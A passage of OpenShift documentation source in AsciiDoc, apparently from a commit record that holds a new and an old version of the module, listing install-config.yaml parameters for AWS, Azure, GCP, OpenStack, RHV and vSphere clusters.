fully-qualified host name or IP address of the vCenter server.\n|String\n\n|`platform.vsphere.username`\n|The user name to use to connect to the vCenter instance with. This user must have at least\nthe roles and privileges that are required for\nlink:https:\/\/vmware.github.io\/vsphere-storage-for-kubernetes\/documentation\/vcp-roles.html[static or dynamic persistent volume provisioning]\nin vSphere.\n|String.\n\n|`platform.vsphere.password`\n|The password for the vCenter user name.\n|String.\n\n|`platform.vsphere.datacenter`\n|The name of the datacenter to use in the vCenter instance.\n|String.\n\n|`platform.vsphere.defaultDatastore`\n|The name of the default datastore to use for provisioning volumes.\n|String.\n\n|`platform.vsphere.folder`\n|_Optional_. The absolute path of an existing folder where the installation program creates the virtual machines. If you do not provide this value, the installation program creates a folder that is named with the infrastructure ID in the datacenter virtual machine folder.\n|String, for example, `\/<datacenter_name>\/vm\/<folder_name>\/<subfolder_name>`.\n\n|`platform.vsphere.network`\n|The network in the vCenter instance that contains the virtual IP addresses and DNS records that you configured.\n|String.\n\n|`platform.vsphere.cluster`\n|The vCenter cluster to install the {product-title} cluster in.\n|String.\n\n|`platform.vsphere.apiVIP`\n|The virtual IP (VIP) address that you configured for control plane API access.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.vsphere.ingressVIP`\n|The virtual IP (VIP) address that you configured for cluster ingress.\n|An IP address, for example `128.0.0.1`.\n|====\n\n.Optional VMware vSphere machine pool parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.vsphere.osDisk.diskSizeGB`\n|The size of the disk in gigabytes.\n|Integer.\n\n|`platform.vsphere.cpus`\n|The total number of virtual processor cores to assign a virtual machine.\n|Integer.\n\n|`platform.vsphere.coresPerSocket`\n|The number of cores per socket in a virtual machine. The number of virtual CPUs (vCPUs) on the virtual machine is `platform.vsphere.cpus`\/`platform.vsphere.coresPerSocket`. The default value is `1`\n|Integer.\n\n|`platform.vsphere.memoryMB`\n|The size of a virtual machine's memory in megabytes.\n|Integer.\n|====\n\nendif::vsphere[]\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:!azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:!gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:!aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:!osp:\n:!osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:!osp:\n:!osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:!rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:!vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:!osp:\n:!osp-custom:\nendif::[]\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\n\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heteregeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\n\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n|`false` or `true`\n\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the pod network provider in the cluster.\n|Object\n\n|`networking.clusterNetwork`\n|The IP address pools for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`.\n|Array of objects\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. The IP block address pool.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.clusterNetwork.hostPrefix`\n|Required if you use `networking.clusterNetwork`. The prefix size to allocate to each node from the CIDR. For example, 24 would allocate 2^8=256 addresses to each node.\n|Integer\n\n|`networking.machineNetwork`\n|The IP address pools for machines.\n|Array of objects\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. The IP block address pool. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.networkType`\n|The type of network to install. The default is `OpenShiftSDN`.\n|String\n\n|`networking.serviceNetwork`\n|The IP address pools for services. The default is 172.30.0.0\/16.\n|Array of IP networks. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n key1...\n key2...\n key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. Custom API endpoints\ncan be specified for EC2, S3, IAM, Elastic Load Balancing, Tagging, Route 53,\nand STS AWS services.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] name.\n\n|`platform.aws.serviceEndpoints.url`\n|The AWS service endpoint URL. The URL must use the `https` protocol and the\nhost must trust the certificate.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS service endpoint] URL.\n\n|`platform.aws.userTags`\n|A map of keys and values that the installation program adds as tags to all resources that it creates.\n|Any valid YAML map, such as key value pairs in the `<key>: <value>` format. For more information about AWS tags, see link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/Using_Tags.html[Tagging Your Amazon EC2 Resources] in the AWS documentation.\n\n|`platform.aws.subnets`\n|If you provide the VPC instead of allowing the installation program to create the VPC for you, specify the subnet for the cluster to use. The subnet must be part of the same `machineNetwork[].cidr` ranges that you specify. For a standard cluster, specify a public and a private subnet for each availability zone. For a private cluster, specify a private subnet for each availability zone.\n|Valid subnet IDs.\n\n|====\nendif::aws[]\n\nifdef::osp[]\n.Additional {rh-openstack-first} parameters\n[cols=\".^2m,.^3a,^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.rootVolume.size`\n|For compute machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`compute.platform.openstack.rootVolume.type`\n|For compute machines, the root volume's type.\n|String, for example `performance`.\n\n|`controlPlane.platform.openstack.rootVolume.size`\n|For control plane machines, the size in gigabytes of the root volume. If you do not set this value, machines use ephemeral storage.\n|Integer, for example `30`.\n\n|`controlPlane.platform.openstack.rootVolume.type`\n|For control plane machines, the root volume's type.\n|String, for example `performance`.\n\n|`platform.openstack.cloud`\n|The name of the {rh-openstack} cloud to use from the list of clouds in the\n`clouds.yaml` file.\n|String, for example `MyCloud`.\n\n|`platform.openstack.externalNetwork`\n|The {rh-openstack} external network name to be used for installation.\n|String, for example `external`.\n\n|`platform.openstack.computeFlavor`\n|The {rh-openstack} flavor to use for control plane and compute machines.\n|String, for example `m1.xlarge`.\n|====\n\n.Optional {rh-openstack} parameters\n[%header, cols=\".^2,.^3,.^5a\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with compute machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`compute.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with compute machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`compute.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`controlPlane.platform.openstack.additionalNetworkIDs`\n|Additional networks that are associated with control plane machines. Allowed address pairs are not created for additional networks.\n|A list of one or more UUIDs as strings. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n\n|`controlPlane.platform.openstack.additionalSecurityGroupIDs`\n|Additional security groups that are associated with control plane machines.\n|A list of one or more UUIDs as strings. For example, `7ee219f3-d2e9-48a1-96c2-e7429f1b0da7`.\n\n|`controlPlane.platform.openstack.zones`\n|{rh-openstack} Compute (Nova) availability zones (AZs) to install machines on. If this parameter is not set, the installer relies on the default settings for Nova that the {rh-openstack} administrator configured.\n\nOn clusters that use Kuryr, {rh-openstack} Octavia does not support availability zones. Load balancers and, if you are using the Amphora provider driver, {product-title} services that rely on Amphora VMs, are not created according to the value of this property.\n|A list of strings. For example, `[\"zone-1\", \"zone-2\"]`.\n\n|`platform.openstack.clusterOSImage`\n|The location from which the installer downloads the {op-system} image.\n\nYou must set this parameter to perform an installation in a restricted network.\n|An HTTP or HTTPS URL, optionally with an SHA-256 checksum.\n\nFor example, `\\http:\/\/mirror.example.com\/images\/rhcos-43.81.201912131630.0-openstack.x86_64.qcow2.gz?sha256=ffebbd68e8a1f2a245ca19522c16c86f67f9ac8e4e0c1f0a812b068b16f7265d`.\nThe value can also be the name of an existing Glance image, for example `my-rhcos`.\n\n|`platform.openstack.defaultMachinePlatform`\n|The default machine pool platform configuration.\n|\n[source,json]\n----\n{\n \"type\": \"ml.large\",\n \"rootVolume\": {\n \"size\": 30,\n \"type\": \"performance\"\n }\n}\n----\n|`platform.openstack.ingressFloatingIP`\n|An existing floating IP address to associate with the Ingress port. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.lbFloatingIP`\n|An existing floating IP address to associate with the API load balancer. To use this property, you must also define the `platform.openstack.externalNetwork` property.\n|An IP address, for example `128.0.0.1`.\n\n|`platform.openstack.externalDNS`\n|IP addresses for external DNS servers that cluster instances use for DNS resolution.\n|A list of IP addresses as strings. For example, `[\"8.8.8.8\", \"192.168.1.12\"]`.\n\n|`platform.openstack.machinesSubnet`\n|The UUID of a {rh-openstack} subnet that the cluster's nodes use. Nodes and virtual IP (VIP) ports are created on this subnet.\n\nThe first item in `networking.machineNetwork` must match the value of `machinesSubnet`.\n\nIf you deploy to a custom subnet, you cannot specify an external DNS server to the {product-title} installer. Instead, link:https:\/\/access.redhat.com\/documentation\/en-us\/red_hat_openstack_platform\/16.0\/html\/command_line_interface_reference\/subnet[add DNS to the subnet in {rh-openstack}].\n\n|A UUID as a string. For example, `fa806b2f-ac49-4bce-b9db-124bc64209bf`.\n|====\nendif::osp[]\n\nifdef::azure[]\n.Additional Azure parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`machines.platform.azure.type`\n|The Azure VM instance type.\n|VMs that use Windows or Linux as the operating system. See the\nlink:https:\/\/docs.microsoft.com\/en-us\/azure-stack\/operator\/azure-stack-supported-os?view=azs-1908[Guest operating systems supported on Azure Stack]\nin the Azure documentation.\n\n|`machines.platform.azure.osDisk.diskSizeGB`\n|The Azure disk size for the VM.\n|Integer that represents the size of the disk in GB, for example `512`. The\nminimum supported disk size is `120`.\n\n|`platform.azure.baseDomainResourceGroupName`\n|The name of the resource group that contains the DNS zone for your base domain.\n|String, for example `production_cluster`.\n\n|`platform.azure.outboundType`\n|The outbound routing strategy used to connect your cluster to the internet. If\nyou are using user-defined routing, you must have pre-existing networking\navailable where the outbound routing has already been configured prior to\ninstalling a cluster. The installation program is not responsible for\nconfiguring user-defined routing.\n|`LoadBalancer` or `UserDefinedRouting`. The default is `LoadBalancer`.\n\n|`platform.azure.region`\n|The name of the Azure region that hosts your cluster.\n|Any valid region name, such as `centralus`.\n\n|`platform.azure.zone`\n|List of availability zones to place machines in. For high availability, specify\nat least two zones.\n|List of zones, for example `[\"1\", \"2\", \"3\"]`.\n\n|`platform.azure.networkResourceGroupName`\n|The name of the resource group that contains the existing VNet that you want to deploy your cluster to. This name cannot be the same as the `platform.azure.baseDomainResourceGroupName`.\n|String.\n\n|`platform.azure.virtualNetwork`\n|The name of the existing VNet that you want to deploy your cluster to.\n|String.\n\n|`platform.azure.controlPlaneSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your control plane machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.computeSubnet`\n|The name of the existing subnet in your VNet that you want to deploy your compute machines to.\n|Valid CIDR, for example `10.0.0.0\/16`.\n\n|`platform.azure.cloudName`\n|The name of the Azure cloud environment that is used to configure the Azure SDK with the appropriate Azure API endpoints. If empty, the default value `AzurePublicCloud` is used.\n|Any valid cloud environment, such as `AzurePublicCloud` or `AzureUSGovernmentCloud`.\n\n|====\n\n[NOTE]\n====\nYou cannot customize\nlink:https:\/\/azure.microsoft.com\/en-us\/global-infrastructure\/availability-zones\/[Azure Availability Zones]\nor\nlink:https:\/\/docs.microsoft.com\/en-us\/azure\/azure-resource-manager\/resource-group-using-tags[Use tags to organize your Azure resources]\nwith an Azure cluster.\n====\nendif::azure[]\n\n\nifdef::gcp[]\n.Additional Google Cloud Platform (GCP) parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.gcp.network`\n|The name of the existing VPC that you want to deploy your cluster to.\n|String.\n\n|`platform.gcp.type`\n|The link:https:\/\/cloud.google.com\/compute\/docs\/machine-types[GCP machine type].\n|The GCP machine type.\n\n|`platform.gcp.zones`\n|The availability zones where the installation program creates machines for the specified MachinePool.\n|A list of valid link:https:\/\/cloud.google.com\/compute\/docs\/regions-zones#available[GCP availability zones], such as `us-central1-a`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`platform.gcp.controlPlaneSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your control plane machines to.\n|The subnet name.\n\n|`platform.gcp.computeSubnet`\n|The name of the existing subnet in your VPC that you want to deploy your compute machines to.\n|The subnet name.\n|====\n\nendif::gcp[]\n\nifdef::rhv[]\n\n.Additional {rh-virtualization-first} parameters for clusters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`platform.ovirt.ovirt_cluster_id`\n|Required. The Cluster where the VMs will be created.\n|String. For example: `68833f9f-e89c-4891-b768-e2ba0815b76b`\n\n|`platform.ovirt.ovirt_storage_domain_id`\n|Required. The Storage Domain ID where the VM disks will be created.\n|String. For example: `ed7b0f4e-0e96-492a-8fff-279213ee1468`\n\n|`platform.ovirt.ovirt_network_name`\n|Required. The network name where the VM nics will be created.\n|String. For example: `ocpcluster`\n\n|`platform.ovirt.vnicProfileID`\n|Required. The vNIC profile ID of the VM network interfaces. This can be inferred if the cluster network has a single profile.\n|String. For example: `3fa86930-0be5-4052-b667-b79f0a729692`\n\n|`platform.ovirt.api_vip`\n|Required. An IP address on the machine network that will be assigned to the API virtual IP (VIP). You can access the OpenShift API at this endpoint.\n|String. Example: `10.46.8.230`\n\n|`platform.ovirt.ingress_vip`\n|Required. An IP address on the machine network that will be assigned to the Ingress virtual IP (VIP).\n|String. Example: `10.46.8.232`\n|====\n\n\n.Additional {rh-virtualization} parameters for machine pools\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`<machine-pool>.platform.ovirt.cpu`\n|Optional. Defines the CPU of the VM.\n|Object\n\n|`<machine-pool>.platform.ovirt.cpu.cores`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of cores. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.cpu.sockets`\n|Required if you use `<machine-pool>.platform.ovirt.cpu`. The number of sockets per core. Total virtual CPUs (vCPUs) is cores * sockets.\n|Integer\n\n|`<machine-pool>.platform.ovirt.memoryMB`\n|Optional. Memory of the VM in MiB.\n|Integer\n\n|`<machine-pool>.platform.ovirt.instanceTypeID`\n|Optional. An instance type UUID, such as `00000009-0009-0009-0009-0000000000f1`, which you can get from the `https:\/\/<engine-fqdn>\/ovirt-engine\/api\/instancetypes` endpoint.\n|String of UUID\n\n|`<machine-pool>.platform.ovirt.osDisk`\n|Optional. Defines the first and bootable disk of the VM.\n|String\n\n|`<machine-pool>.platform.ovirt.osDisk.sizeGB`\n|Required if you use `<machine-pool>.platform.ovirt.osDisk`. Size of the disk in GiB.\n|Number\n\n|`<machine-pool>.platform.ovirt.vmType`\n|Optional. The VM workload type, such as `high-performance`, `server`, or `desktop`.\n|String\n|====\n\n[NOTE]\n====\nYou can replace `<machine-pool>` with `controlPlane` or `compute`.\n====\n\nendif::rhv[]\n\nifdef::vsphere[]\n.Additional VMware vSphere cluster 